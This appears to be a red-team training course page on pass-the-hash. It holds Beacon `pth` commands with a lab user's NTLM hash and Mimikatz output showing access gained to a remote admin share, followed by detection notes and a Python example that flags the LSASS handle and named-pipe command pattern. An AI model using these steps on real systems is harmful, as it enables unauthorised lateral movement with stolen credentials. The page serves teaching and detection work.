# Pass the Hash

Pass the hash is a technique that allows you to authenticate to a Windows service using the NTLM hash of a user's password. It works by starting a new logon session with a fake identity and then replacing the session information with the domain, username and NTLM hash provided.

Beacon has a dedicated `pth` command which executes Mimikatz in the background.

This command requires elevated privileges.

First, attempt to list the C$ share of the WEB machine - this will fail because bfarmer is not a local admin there.

```
beacon> getuid
[*] You are DEV\bfarmer (admin)

beacon> ls \\web.dev.cyberbotic.io\c$
[-] could not open \\web.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
```

Then run the `pth` command with jking's username and NTLM hash.

```
beacon> pth DEV\jking 59fc0f884922b4ce376051134c71e22c

user	: jking
domain	: DEV
program	: C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08
impers.	: no
NTLM	: 59fc0f884922b4ce376051134c71e22c
  |  PID  1932
  |  TID  6600
  |  LSA Process is now R/W
  |  LUID 0 ; 7479840 (00000000:00722220)
  \_ msv1_0   - data copy @ 000001F6344B3D20 : OK !
  \_ kerberos - data copy @ 000001F6345BD7C8
   \_ aes256_hmac       -> null             
   \_ aes128_hmac       -> null             
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001F6344C6128 (32) -> null
```

We can see that the command Mimikatz runs passes the new credentials over a named pipe, which Beacon then impersonates automatically. We can then attempt to list the C$ share again, which will now succeed.

```
beacon> ls \\web.dev.cyberbotic.io\c$
[*] Listing: \\web.dev.cyberbotic.io\c$\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/15/2022 18:50:13   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     08/15/2022 18:58:09   inetpub
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/24/2022 11:02:25   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     08/31/2022 17:40:32   ProgramData
          dir     08/15/2022 18:31:08   Recovery
          dir     08/30/2022 11:16:24   System Volume Information
          dir     08/30/2022 17:51:08   Users
          dir     08/30/2022 20:19:27   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/01/2022 07:26:41   DumpStack.log.tmp
 384mb    fil     09/01/2022 07:26:41   pagefile.sys
```

To "drop" impersonation afterwards, use the `rev2self` command.

```
beacon> rev2self
[*] Tasked beacon to revert token

beacon> ls \\web.dev.cyberbotic.io\c$
[-] could not open \\web.dev.cyberbotic.io\c$\*: 5 - ERROR_ACCESS_DENIED
```

**OPSEC**

Two opportunities to detect PTH are the R/W handle to LSASS, and the `echo foo > \\.\pipe\bar` pattern in command-line logs.

The former is already part of the "Suspicious Handle to LSASS" saved search. This time we see an access mask of 0x1038. This is a combination of PROCESS\_QUERY\_LIMITED\_INFORMATION (0x1000), PROCESS\_VM\_WRITE (0x0020), PROCESS\_VM\_READ (0x0010) and PROCESS\_VM\_OPERATION (0x0008).

![](https://files.cdn.thinkific.com/file_uploads/584845/images/074/46d/801/lsass-rw.png)

The latter can be found via the "Suspicious Named Pipe Impersonation" search, which queries process events where the arguments contain "echo", ">" and "\\\\.\pipe\\".

![](https://files.cdn.thinkific.com/file_uploads/584845/images/11f/d79/42f/named-pipe.png)
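The two detection ideas above, worked through as an added example (not part of the original course notes or of any real SIEM search): decode the 0x1038 access mask into the PROCESS_* rights named in the text, and scan constructed process-creation events for the `echo ... > \\.\pipe\...` pattern. The event records and field names are assumptions for illustration.

```python
import re

# PROCESS_* access rights referenced in the OPSEC note; together they sum to 0x1038.
PROCESS_ACCESS_RIGHTS = {
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

def decode_access_mask(mask):
    """Return the names of the known access-right bits set in mask, lowest bit first."""
    return [name for bit, name in sorted(PROCESS_ACCESS_RIGHTS.items()) if mask & bit]

def is_rw_lsass_handle(mask):
    """True when the handle grants both VM_READ and VM_WRITE, i.e. the R/W LSASS access
    the page describes (a read-only 0x1010 handle would not trigger this)."""
    return bool(mask & 0x0010) and bool(mask & 0x0020)

# Mimikatz pth launches: cmd.exe /c echo <token> > \\.\pipe\<name>
PIPE_ECHO_RE = re.compile(r'echo\s+\S+\s*>\s*\\\\\.\\pipe\\\S+', re.IGNORECASE)

def is_pipe_impersonation_cmdline(cmdline):
    """Match the echo-to-named-pipe pattern from the 'Suspicious Named Pipe Impersonation' idea."""
    return PIPE_ECHO_RE.search(cmdline) is not None

# Constructed sample process-creation events (not real telemetry); field names are assumed.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c echo 71fb38e2d65 > \\.\pipe\675b08"},
    {"image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"C:\Windows\system32\cmd.exe /c echo hello > C:\temp\out.txt"},
    {"image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r"cmd.exe /c dir \\.\pipe\\"},
]

def find_pipe_impersonation(events):
    """Return the command lines of events matching the named-pipe echo pattern."""
    return [e["cmdline"] for e in events if is_pipe_impersonation_cmdline(e["cmdline"])]

if __name__ == "__main__":
    print("0x1038 =", " | ".join(decode_access_mask(0x1038)))
    for hit in find_pipe_impersonation(SAMPLE_EVENTS):
        print("suspicious:", hit)
```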
